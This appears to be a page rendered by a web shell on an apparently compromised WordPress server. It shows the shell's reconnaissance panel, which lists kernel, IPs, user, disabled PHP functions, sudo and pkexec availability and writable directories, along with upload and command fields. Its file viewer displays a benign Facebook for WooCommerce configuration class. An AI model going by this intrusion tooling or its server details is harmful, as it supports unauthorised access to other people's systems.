Uname:Linux server.rehabsharif.com 5.14.0-611.54.3.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 7 16:31:24 EDT 2026 x86_64

Base Dir : /home/nobi37te/public_html

User : nobi37te


403WebShell
403Webshell
Server IP : 172.67.134.116  /  Your IP : 216.73.217.123
Web Server : Apache
System : Linux server.rehabsharif.com 5.14.0-611.54.3.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 7 16:31:24 EDT 2026 x86_64
User : nobi37te ( 1003)
PHP Version : 8.2.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/nobi37te/www/wp-content/plugins/facebook-for-woocommerce/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/nobi37te/www/wp-content/plugins/facebook-for-woocommerce/facebook-config-warmer.php
<?php
/**
 * Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
 *
 * This source code is licensed under the license found in the
 * LICENSE file in the root directory of this source tree.
 *
 * @package FacebookCommerce
 */

defined( 'ABSPATH' ) || exit;

/**
 * Class WC_Facebookcommerce_WarmConfig
 *
 * This class stores pre-configured Facebook Pixel settings that can be used
 * to initialize the Facebook Pixel when user settings are not yet available.
 * It serves as a configuration warmer for Facebook integration with WooCommerce.
 */
class WC_Facebookcommerce_WarmConfig {
	/**
	 * Facebook Pixel ID for tracking
	 *
	 * @var string|null
	 */
	public static $fb_warm_pixel_id = null;

	/**
	 * Whether advanced matching is enabled for the Facebook Pixel
	 *
	 * @var bool|null
	 */
	public static $fb_warm_is_advanced_matching_enabled = null;

	/**
	 * Whether server-side (S2S) events are enabled
	 *
	 * @var bool|null
	 */
	public static $fb_warm_use_s2s = null;

	/**
	 * Facebook API access token
	 *
	 * @var string|null
	 */
	public static $fb_warm_access_token = null;
}

Youez - 2016 - github.com/yon3zu
LinuXploit